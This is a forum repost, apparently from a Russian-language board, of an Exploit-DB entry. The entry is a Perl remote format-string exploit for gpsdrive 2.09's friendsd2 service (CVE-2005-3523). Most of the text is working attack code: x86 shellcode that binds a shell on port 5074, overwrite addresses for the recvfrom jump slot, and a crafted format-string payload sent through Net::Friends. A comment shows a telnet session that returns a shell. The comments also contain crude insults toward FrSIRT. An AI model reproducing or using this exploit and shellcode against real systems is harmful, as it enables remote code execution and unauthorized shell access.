Exploit gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1291
Проверка EDB
  1. Пройдено
Автор
KEVIN FINISTERRE
Тип уязвимости
REMOTE
Платформа
LINUX_X86
CVE
cve-2005-3523
Дата публикации
2005-11-04
Код:
#!/usr/bin/perl -w
# 
# Code by KF, although it is most likely ripped from John H. 
#  (kf_lists[at]digital_munition[dot]com)
#
# http://www.digitalmunition.com
#
# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles.
# Free 14 day Testicle licking trial available!
#
# friendsd.c:367:   fprintf (stderr, txt);
#
# Tested on intel using gpsdrive_2.09-2_i386.deb
# 
# kfinisterre@animosity:~$ telnet localhost 5074
# Trying 127.0.0.1...
# Connected to animosity
# Escape character is '^]'.
# id;
# uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre)
# : command not found
#
# [email protected]
# x86 portbind a shell in port 5074
# 92 bytes.
# 
# This shit is NOT robust and most likely will NOT work on kernel 2.6.12 
# because of the random address space. Find your own damn pointers to overwrite
#
$shellcode  = "\x90" x 2 . 
"\x31\xc0" .			# xorl		%eax,%eax
"\x50" .			# pushl	%eax
"\x40" .			# incl		%eax
"\x89\xc3" .			# movl		%eax,%ebx
"\x50" .			# pushl	%eax
"\x40" .			# incl		%eax
"\x50" .			# pushl	%eax
"\x89\xe1" .			# movl		%esp,%ecx
"\xb0\x66" .			# movb		$0x66,%al
"\xcd\x80" .			# int		$0x80
"\x31\xd2" .			# xorl		%edx,%edx
"\x52" .			# pushl	%edx
"\x66\x68\x13\xd2" .		# pushw	$0xd213
"\x43" .			# incl		%ebx
"\x66\x53" .			# pushw	%bx
"\x89\xe1" .			# movl		%esp,%ecx
"\x6a\x10" .			# pushl	$0x10
"\x51" .			# pushl	%ecx
"\x50" .			# pushl	%eax
"\x89\xe1" .			# movl		%esp,%ecx
"\xb0\x66" .			# movb		$0x66,%al
"\xcd\x80" .			# int		$0x80
"\x40" .			# incl		%eax
"\x89\x44\x24\x04" .		# movl		%eax,0x4(%esp,1)
"\x43" .			# incl		%ebx
"\x43" .			# incl		%ebx
"\xb0\x66" .			# movb		$0x66,%al
"\xcd\x80" .			# int		$0x80
"\x83\xc4\x0c" .		# addl		$0xc,%esp
"\x52" .			# pushl	%edx
"\x52" .			# pushl	%edx
"\x43" .			# incl		%ebx
"\xb0\x66" .			# movb		$0x66,%al
"\xcd\x80" .			# int		$0x80
"\x93" .			# xchgl	%eax,%ebx
"\x89\xd1" .			# movl		%edx,%ecx
"\xb0\x3f" .			# movb		$0x3f,%al
"\xcd\x80" .			# int		$0x80
"\x41" .			# incl		%ecx
"\x80\xf9\x03" .		# cmpb		$0x3,%cl
"\x75\xf6" .			# jnz		<shellcode+0x40>
"\x52" .			# pushl	%edx
"\x68\x6e\x2f\x73\x68" .	# pushl	$0x68732f6e
"\x68\x2f\x2f\x62\x69" .	# pushl	$0x69622f2f
"\x89\xe3" .			# movl		%esp,%ebx
"\x52" .			# pushl	%edx
"\x53" .			# pushl	%ebx
"\x89\xe1" .			# movl		%esp,%ecx
"\xb0\x0b" .			# movb		$0xb,%al
"\xcd\x80";			# int		$0x80

use Net::Friends;
use Data::Dumper;

$name = 'GPSDRIVE-aaaa';

# 0804bb84 R_386_JUMP_SLOT   recvfrom
$addy  = "\x86\xbb\x04\x08";  # This is the write address. 
$addy2 = "\x84\xbb\x04\x08"; 

#$retaddr = 0xbfffba7c;  # Retaddr when using gdb 
$retaddr = 0xbfffba8a;  # Retaddr when NOT using gdb. Its that same kick you in the face styleee from the ppc sploit. 

$lo = ($retaddr >> 0) & 0xffff;
$hi = ($retaddr >> 16) & 0xffff;
		
$hi = $hi - 0x4c;
$lo = (0x10000 + $lo) - $hi - 0x4c;		

$hi =1; $lo =1;

$dir = "$addy$addy2%." . $hi . "d%379\$x%." . $lo . "d%380\$x$shellcode";

$friends = Net::Friends->new(shift || 'localhost');
$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir);

print Dumper($friends->query);

# P.S. - I fart in the general direction of Fr-Sirt. 

# milw0rm.com [2005-11-04]
 
Источник
www.exploit-db.com

Похожие темы